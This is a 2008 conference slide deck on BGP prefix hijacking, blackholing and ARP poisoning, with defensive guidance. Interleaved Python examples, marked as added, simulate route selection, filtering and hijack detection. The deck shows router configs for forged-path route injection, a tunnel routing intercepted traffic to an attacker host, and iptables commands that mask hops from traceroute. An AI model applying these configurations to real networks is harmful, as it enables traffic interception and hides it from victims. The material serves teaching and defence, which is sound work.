internet pirates: blackholing, hijacking and other dirty tricks
Post on 16-Jul-2015
Pirates of the Internet: Blackholing, hijacking and other dirty tricks
Carlos Fragoso Mariscal
London 2008
Who am I?
• Information Security Professional
• Operations and Security Manager for Supercomputing Center of Catalonia
  – Anella Científica RREN, CATNIX IXP …
• Technical Director of one eSecurity
• Involved in several IR communities
  – ABUSES, TF-CSIRT, NSP-SEC …
• SANS Volunteer since 2002
• Cisco Systems and GIAC Certified
  – CCNA, CCNP*, GSEC, GCFW, GCIH
How routing tables work?
[Diagram: BGP, OSPF, ISIS, RIP, Static and Connected routes feeding the Global table]
1. Each routing protocol builds its own table based on its metrics
2. Prefixes are elected based on prefix mask and administrative distance
3. Prefixes are installed
More specific prefixes take precedence
BGP Selection Algorithm
1. Highest Local Preference
2. Locally originated, aggregated, redistribution…
3. Shortest AS-PATH
4. Lowest origin type
5. Lowest Multi Exit Discriminator (MED)
6. eBGP over iBGP paths
7. Lowest IGP metric to next-hop
8. Received first
…etc…
Any prefix received with the local AS in its AS-Path attribute is dropped
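The selection steps and the loop-prevention rule above, together with the "more specific wins" rule of the forwarding table, are easy to misread as one ordered list. They are two separate decisions: the decision process picks one best path per prefix, and the forwarding lookup then picks the longest matching prefix regardless of how that path was chosen. The following Python is an added illustration (not from the deck) that encodes each decision step as one element of a comparison key and adds a longest-prefix lookup; the local ASN (1, from the "Known via bgp 1" output), the documentation prefixes and the next hops are assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumption: this router sits in AS 1 (the deck's "Known via bgp 1").
LOCAL_AS = 1

ORIGIN_RANK = {"i": 0, "e": 1, "?": 2}   # IGP < EGP < incomplete


@dataclass
class Route:
    prefix: str
    next_hop: str
    as_path: List[int]          # leftmost = neighbour, rightmost = origin AS
    local_pref: int = 100
    locally_originated: bool = False
    origin: str = "i"
    med: int = 0
    ebgp: bool = True
    igp_metric: int = 0
    received_order: int = 0     # lower value = learned earlier


def accepted(route: Route, local_as: int = LOCAL_AS) -> bool:
    """Loop prevention: any update carrying our own ASN in AS-PATH is dropped."""
    return local_as not in route.as_path


def selection_key(route: Route) -> Tuple:
    # One tuple element per decision step; tuples compare element by element,
    # so the route with the smallest key wins.  Negation turns the
    # "highest wins" step into a "lowest wins" one.
    return (
        -route.local_pref,                      # 1. highest local preference
        0 if route.locally_originated else 1,   # 2. locally originated
        len(route.as_path),                     # 3. shortest AS-PATH
        ORIGIN_RANK[route.origin],              # 4. lowest origin type
        route.med,                              # 5. lowest MED
        0 if route.ebgp else 1,                 # 6. eBGP over iBGP
        route.igp_metric,                       # 7. lowest IGP metric to next hop
        route.received_order,                   # 8. received first
    )


def best_path(candidates: List[Route], local_as: int = LOCAL_AS) -> Optional[Route]:
    """Return the path that would carry the '>' flag in 'show ip bgp'."""
    valid = [r for r in candidates if accepted(r, local_as)]
    return min(valid, key=selection_key) if valid else None


def longest_match(rib: Dict[str, str], address: str) -> Optional[Tuple[str, str]]:
    """Forwarding lookup on the installed table: the most specific prefix wins,
    which is why an injected /24 captures traffic for one slice of a /19."""
    addr = ipaddress.ip_address(address)
    hits = [(ipaddress.ip_network(p), nh) for p, nh in rib.items()
            if addr in ipaddress.ip_network(p)]
    if not hits:
        return None
    net, nh = max(hits, key=lambda h: h[0].prefixlen)
    return str(net), nh


# Constructed sample: the two candidates from the deck's 'show ip bgp' output
# (198.51.0.0/16 stands in for A.B.0.0/16).
CANDIDATES = [
    Route("198.51.0.0/16", "10.10.10.1", [300, 200, 100, 10], received_order=0),
    Route("198.51.0.0/16", "10.10.20.1", [300, 100, 80], received_order=1),
]

# Constructed RIB: a legitimate /19 plus a more-specific /24 installed next to it.
RIB = {"198.51.96.0/19": "10.10.20.1", "198.51.100.0/24": "10.10.10.1"}

if __name__ == "__main__":
    best = best_path(CANDIDATES)
    print("best path:", best.next_hop, best.as_path)
    print(longest_match(RIB, "198.51.100.7"))
    print(longest_match(RIB, "198.51.97.7"))
```

With the deck's two candidates the shorter AS-PATH wins, so 10.10.20.1 is selected, matching the "Last update from 10.10.20.1 … AS Hops 3" routing entry; an address inside 198.51.100.0/24 is forwarded by the /24 entry even though the /19 is also present.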
BGP table
BGP table version is NNNNNNNN, local router ID is A.B.C.D
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric Path
*  A.B.0.0          10.10.10.1               0 300 200 100 10 i
*                   10.10.20.1               0 300 100 80 i

Global table
Routing entry for A.B.0.0/16
  Known via "bgp 1", distance 20, metric 0
  Tag 7018, type external
  Last update from 10.10.20.1 1d00h ago
  Routing Descriptor Blocks:
  * 10.10.20.1, from 10.10.20.1, 1d00h ago
      Route metric is 0, traffic share count is 1
      AS Hops 3
      Route tag 7018
Internet Routing Registry (IRR)
• Route registration database
• Routing Policy description language (RFC 2622)
• Common objects
  – route / route-set
  – aut-num / AS-Set
  – Peering-set
• Most well-known
  – RADB
  – RIPE

route:      A.B.0.0/19
descr:      Monkey Business
origin:     AS100
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

as-set:     AS-MONKEY-CUSTOMERS
descr:      MONKEY CUSTOMERS
members:    AS100
members:    AS200
members:    AS300
tech-c:     MONK1-RIPE
admin-c:    MONK2-RIPE
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

route:      C.D.0.0/24
descr:      Monkey Shop
origin:     AS200
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

Source: RIPE Whois Database – http://www.ripe.net/db/whois.html
Threats
• Internet is a chain of trust
  – “A chain is only as strong as its weakest link”
• Weak peer filtering policies
• Unauthorized route IRR registration
• Routing infrastructure compromise
• Future BGP peering vulnerabilities
Pirates of the Internet
• Internet 101
• Attacks
  – Blackholing
  – MitM Hijacking
  – Ghost Hijacking
• Countermeasures
Blackholing
• Poisoning a more specific route
  – Ex: /24 overlapping main /19
• Traffic is dropped at destination
  – Route to Null0
• Not very effective for small prefixes (</24)
  – Depends on transit providers policies
MitM Hijacking
• Victim reconnaissance
• Attack Engineering
• Routing Infrastructure compromise
• Prefix poisoning
• Traffic interception and abuse
• Traffic forwarding
• Obfuscation (optional)
[Diagram: example topology with AS 10, AS 20, AS 30, AS 40, AS 50, AS 60, AS 100 and AS 200]
Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org
MitM Hijacking
• Victim reconnaissance
  – RR Database objects
  – Internet topology around it
  – NOC social engineering
• Attack Engineering
  – Plan reply path (take note of ASN’s)
  – Possible points of injection
• Routing Infrastructure compromise
• Prefix poisoning
• Traffic interception and abuse
• Traffic forwarding
• Obfuscation (optional)
[Diagram: the same topology; AS 200 originates 1.0.0.0/16]
1. Pirate performs reconnaissance on AS200
3. Pirate compromises routing infrastructure on AS100
Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org
MitM Hijacking
• Victim reconnaissance
• Attack Engineering
• Routing Infrastructure compromise
• Prefix poisoning
  – Specific BGP prefix injection
  – AS-PATH prepend reply path ASN’s
  – Policy routing to nail next-hop on
• Traffic interception and abuse
• Traffic forwarding
• Obfuscation (optional)
Poison Route Injection
ip prefix-list NET A.B.C.0/24
route-map hijacked permit 10
 match ip address prefix-list NET
 set as-path prepend 10 20 200
route-map hijacked permit 20
router bgp 100
 neighbor <AS10_PEER> route-map hijack out
[Diagram: the same topology with the injected prefix propagating]
5. Traffic is abused (i.e. sniff) and sent back using AS10 (policy routing)
6. Traffic is received by victim without noticing abusive activity
Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org
Policy routing
interface Tunnel10
 description MONKEY-PIRATE
 ip address 10.10.10.1 255.255.255.252
 ip policy route-map BACK
 tunnel source interface Loopback0
 tunnel destination <PIRATE IP>
!
interface FastEthernet0
 description Link to AS10 PROVIDER
 ip address 172.16.1.1 255.255.255.252
!
ip route A.B.C.0 0.0.0.255 10.10.10.2
ip access-list standard NET A.B.C.0 0.0.0.255
route-map BACK permit 10
 match ip address NET
 set ip next-hop 172.16.1.2
route-map BACK permit 20
ARP poisoning attack
[Diagram: three hosts on one LAN: gateway 192.168.0.1 (MAC FEEA:FEEA:FEEA), attacker 192.168.0.200 (MAC 0001:0236:8624), victim 192.168.0.20 (MAC 000E:3858:AEDE)]
1. IP forwarding and sniffing activation
2. Send spoofed ARP reply (poison), 0:1:2:36:86:24 to 0:e:38:58:ae:de: “arp reply 192.168.0.1 is-at 0:1:2:36:86:24”
3. ARP update (poisoned): 192.168.0.1 is now mapped to 00-01-02-36-86-24
4. Traffic sent to default gateway (00-01-02-36-86-24)
5. Traffic capture and forwarding
MitM Hijacking
• Victim reconnaissance
• Attack Engineering
• Routing Infrastructure compromise
• Prefix poisoning
• Traffic interception and abuse
• Traffic forwarding
• Obfuscation (optional)

Traceroute during Hijacking with TTL additive technique
[Diagram: traceroute output during the hijack, with the TTL additive set to +10]
Source: “Stealing the Internet” Defcon Talk – http://www.defcon.org
TTL additive on Linux
iptables -t mangle -I PREROUTING -i eth1 -j TTL --ttl-inc N
iptables -t mangle -I POSTROUTING -o eth1 -j TTL --ttl-inc N
sysctl -w net.ipv4.ip_forward=1
Hands-on Lab
• GNS3 graphical network simulator
• Dynamips Cisco IOS emulator
• Dynagen network configuration generator
• VMWare Fusion VM’s for end nodes
Ghost Hijacking
• Unallocated space hijacking
• Used temporarily by attackers to hide their activity and avoid abuse notifications
• Nowadays mostly used for spam but could be used for other dirty issues (terrorism)
• Legal issues: who is responsible for something that doesn’t belong to anyone?
Protection
• Review and harden your peerings
• Register and protect your objects on IRR DB
• Take Routing Registry RIPE-NCC training course
  – http://www.ripe.net/training/rr/index.html
• Hide your infrastructure: set up antispoofing (ACL’s or RPF) and infrastructure (ACL’s) filtering
• Have beers with other NOC or SOC teams
  – Why not on a SANS conference?
  – Join mailing lists instead
Peer route filtering
• Where?
  – Customer side
  – Internet Exchange Points (IXP) / Private peerings
  – Transit providers
• What?
  – Maximum number
  – AS-Path
  – Prefixes (static or dynamic)
• Tips’n’tricks
  – IRRToolset tool (RIPE-NCC, ISC)
  – Bogon Route Servers (Cymru)
  – Secure BGP configuration guides (Cymru, NIST, SANS RR papers)
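The "Prefixes (static or dynamic)" and "Maximum number" items above are what tools such as IRRToolset derive from the IRR objects shown earlier: expand the customer's as-set, collect the route objects those ASNs registered, and turn them into an inbound prefix-list plus a maximum-prefix limit. The following Python is an added, simplified version of that workflow (not IRRToolset and not code from the deck); the RPSL text is constructed, modelled on the deck's Monkey objects with documentation prefixes and ASNs in place of A.B.0.0/19, C.D.0.0/24 and the provider ASN, and the nested and circular set references are included to show why expansion must track visited sets.

```python
import ipaddress
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed sample IRR data modelled on the deck's RPSL objects.
SAMPLE_IRR = """\
route:      198.51.96.0/19
descr:      Monkey Business
origin:     AS100
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

route:      192.0.2.0/24
descr:      Monkey Shop
origin:     AS200
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

route:      203.0.113.0/24
descr:      Somebody else, not a customer
origin:     AS64500
mnt-by:     OTHER-MNT
source:     RIPE # Filtered

as-set:     AS-MONKEY-CUSTOMERS
descr:      MONKEY CUSTOMERS
members:    AS100
members:    AS200
members:    AS-MONKEY-RESELLERS
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered

as-set:     AS-MONKEY-RESELLERS
descr:      nested set that also points back at its parent
members:    AS300
members:    AS-MONKEY-CUSTOMERS
mnt-by:     MONKEY-ISP-MNT
source:     RIPE # Filtered
"""

RPSLObject = Dict[str, List[str]]


def parse_rpsl(text: str) -> List[RPSLObject]:
    """Split whois-style text into blank-line separated objects of
    attribute -> list of values; repeated attributes (members:) accumulate."""
    objects: List[RPSLObject] = []
    current: RPSLObject = defaultdict(list)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()        # drop "# Filtered" style remarks
        if not line.strip():
            if current:
                objects.append(dict(current))
                current = defaultdict(list)
            continue
        key, _, value = line.partition(":")
        current[key.strip().lower()].append(value.strip())
    if current:
        objects.append(dict(current))
    return objects


def expand_as_set(objects: List[RPSLObject], name: str,
                  seen: Optional[Set[str]] = None) -> Set[int]:
    """Resolve an as-set to the ASNs it contains, recursing into nested sets
    and tolerating the circular references real IRR data contains."""
    seen = set() if seen is None else seen
    if name.upper() in seen:
        return set()
    seen.add(name.upper())
    asns: Set[int] = set()
    for obj in objects:
        if obj.get("as-set", [""])[0].upper() != name.upper():
            continue
        for member in obj.get("members", []):
            if member.upper().startswith("AS-"):
                asns |= expand_as_set(objects, member, seen)
            else:
                asns.add(int(member[2:]))
    return asns


def prefixes_for(objects: List[RPSLObject], asns: Set[int]) -> List[str]:
    """Route objects whose origin is one of the given ASNs, validated and sorted."""
    nets = []
    for obj in objects:
        if "route" in obj and int(obj["origin"][0][2:]) in asns:
            nets.append(ipaddress.ip_network(obj["route"][0]))   # rejects malformed entries
    return [str(n) for n in sorted(nets)]


def prefix_list(name: str, prefixes: List[str]) -> List[str]:
    """IOS-style inbound prefix-list: exact matches for registered routes, then an
    explicit deny so an unregistered more-specific is refused at the edge."""
    lines = [f"ip prefix-list {name} seq {10 * (i + 1)} permit {p}"
             for i, p in enumerate(prefixes)]
    lines.append(f"ip prefix-list {name} seq {10 * (len(prefixes) + 1)} deny 0.0.0.0/0 le 32")
    return lines


def customer_policy(objects: List[RPSLObject], as_set: str, peer_ip: str) -> List[str]:
    """Prefix-list plus a maximum-prefix limit sized from the registry.
    Constructed policy; AS 64496 is a documentation ASN standing in for our own."""
    prefixes = prefixes_for(objects, expand_as_set(objects, as_set))
    name = as_set.replace("-", "_") + "_IN"
    limit = max(10, 2 * len(prefixes))      # headroom for growth, far below a full table
    return prefix_list(name, prefixes) + [
        "router bgp 64496",
        f" neighbor {peer_ip} prefix-list {name} in",
        f" neighbor {peer_ip} maximum-prefix {limit}",
    ]


if __name__ == "__main__":
    objs = parse_rpsl(SAMPLE_IRR)
    print(sorted(expand_as_set(objs, "AS-MONKEY-CUSTOMERS")))
    print("\n".join(customer_policy(objs, "AS-MONKEY-CUSTOMERS", "10.10.10.2")))
```

The third route object (origin AS64500) is deliberately left out of the generated policy because its origin is not in the expanded set; in practice the generated list should be regenerated whenever the customer updates its IRR objects, which is the "dynamic" prefix filtering the slide refers to.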
Detection
• Alerting Systems
  – Prefix-based NIDS
• Tools
  – RIPE Routing Information Service MyASN
    • http://www.ris.ripe.net/myasn.html
  – Prefix Hijack Alert System (PHAS)
    • http://phas.netsec.colostate.edu/
  – BGPMon Project
    • http://bgpmon.net/
  – University of Roma iBGPPlay
    • http://ibgplay.caspur.it
BGPmon mail sample
Possible Prefix Hijack (Code: 11)
1 number of peer(s) detected this updates for your prefix A.B.C.0/19:
Update details: 2008-11-11 02:01 (UTC)
A.B.C.0/24
Announced by: AS16735 (Companhia de Telecomunicacoes do Brasil Central)
Transit AS: 27664 (CTBC Multimedia)
ASpath: 27664 16735
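The mail sample shows the simplest check a monitoring service performs: a more-specific of a registered prefix turned up with a foreign origin AS. Read together with the poison-route slide, where the AS-PATH is prepended so the announcement ends in the victim's own ASN, an origin-only check is not enough; the profile also has to know which more-specifics the owner really announces and which upstreams are adjacent to it. The Python below is an added example (not BGPmon, MyASN or PHAS code) that applies those three checks to a constructed feed of updates; the monitored prefix, ASNs (all from the documentation range) and alert codes other than the deck's code 11 are assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed monitoring profile describing what we legitimately announce.
# 198.51.96.0/19 stands in for the deck's A.B.C.0/19; AS64496-AS64511 are
# reserved for documentation, so none of these ASNs belong to a real network.
MONITORED: Dict[str, Dict] = {
    "198.51.96.0/19": {
        "origin": 64496,                 # our ASN
        "upstreams": {64497, 64498},     # transits that may appear adjacent to us
        "announced_specifics": set(),    # more-specifics we deliberately announce
    },
}


@dataclass(frozen=True)
class Update:
    timestamp: str
    prefix: str
    as_path: Tuple[int, ...]    # leftmost = collector peer, rightmost = origin


@dataclass(frozen=True)
class Alert:
    code: int
    reason: str
    monitored: str
    seen: str
    as_path: Tuple[int, ...]
    timestamp: str


def check_update(upd: Update, monitored: Dict[str, Dict] = MONITORED) -> Optional[Alert]:
    """Compare one observed update against the profile; return an Alert or None."""
    net = ipaddress.ip_network(upd.prefix)
    origin = upd.as_path[-1]
    upstream = upd.as_path[-2] if len(upd.as_path) > 1 else None
    for mon, prof in monitored.items():
        mon_net = ipaddress.ip_network(mon)
        if net != mon_net and not net.subnet_of(mon_net):
            continue

        def make(code: int, reason: str) -> Alert:
            return Alert(code, reason, mon, upd.prefix, upd.as_path, upd.timestamp)

        if origin != prof["origin"]:
            # the case in the mail sample: foreign origin for our address space
            return make(11, "Possible Prefix Hijack: foreign origin AS")
        if net != mon_net and upd.prefix not in prof["announced_specifics"]:
            # origin looks like us, but we never announced this more-specific:
            # consistent with an AS-PATH prepended with our own ASN
            return make(12, "More-specific with our origin that we do not announce")
        if upstream is not None and upstream not in prof["upstreams"]:
            # path claims a transit we have no session with
            return make(13, "Unexpected adjacent upstream AS")
        return None
    return None


def scan(updates: List[Update]) -> List[Alert]:
    return [a for a in (check_update(u) for u in updates) if a is not None]


def format_alert(a: Alert) -> str:
    """Render in the style of the monitoring mail shown above."""
    return (f"{a.reason} (Code: {a.code}) for your prefix {a.monitored}:\n"
            f"Update details: {a.timestamp} {a.seen}\n"
            f"Announced by: AS{a.as_path[-1]}\n"
            f"ASpath: {' '.join(str(x) for x in a.as_path)}")


# Constructed feed: one legitimate update, three suspicious patterns, one unrelated.
SAMPLE_UPDATES = [
    Update("2008-11-11 02:00 (UTC)", "198.51.96.0/19", (64497, 64496)),                # ours, normal
    Update("2008-11-11 02:01 (UTC)", "198.51.100.0/24", (64499, 64500)),               # foreign /24
    Update("2008-11-11 02:02 (UTC)", "198.51.100.0/24", (64499, 64501, 64497, 64496)), # prepended path
    Update("2008-11-11 02:03 (UTC)", "198.51.96.0/19", (64502, 64496)),                # wrong upstream
    Update("2008-11-11 02:04 (UTC)", "203.0.113.0/24", (64503,)),                      # not ours
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_UPDATES):
        print(format_alert(alert), end="\n\n")
```

Feeding the five constructed updates through `scan` yields three alerts (codes 11, 12 and 13) and ignores the normal and unrelated announcements; the second and third checks are the ones a service that only compares origin ASNs would miss.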
Reaction
• Crying and screaming is allowed
• Contact upstream providers and related mates
  – If you did, remind them you paid their beers
  – iNOC Dial-By-ASN (iNOC-DBA) SIP phone
• Pray for a prompt response
  – From hours to days
  – Depends on how important you are
• Notify Law Enforcement Organizations (LEO’s) if necessary
Secure (origin) BGP
• Draft on IETF RPSEC Working Group
• PKI authentication for IP address blocks mapping ASN assignments
• Digital signature carried over BGP transitive path attribute
• Verification on external device
• “Chicken and Egg” problem … waiting for RFC and ISP deployment
References 1/2
• “Stealing the Internet” A. Pilosov, T. Kapela – Defcon 16 Conference
  http://www.defcon.org/html/links/defcon-media-archives.html#dc_16
• “BGP Routing Security” D. Wendlandt – Carnegie Mellon University
  http://www.cs.cmu.edu/~dwendlan/routing/
• “BGP Security resources”
  http://www.bgp4.as/security
References 2/2
• “BGP Vulnerability Testing” S. Convery, Matthew Franz
  http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
• “Hacking Cisco Networks Exposed” A. Vladimirov, A. Mikhailovsky – McGraw Hill, ISBN: 0-07-225917-5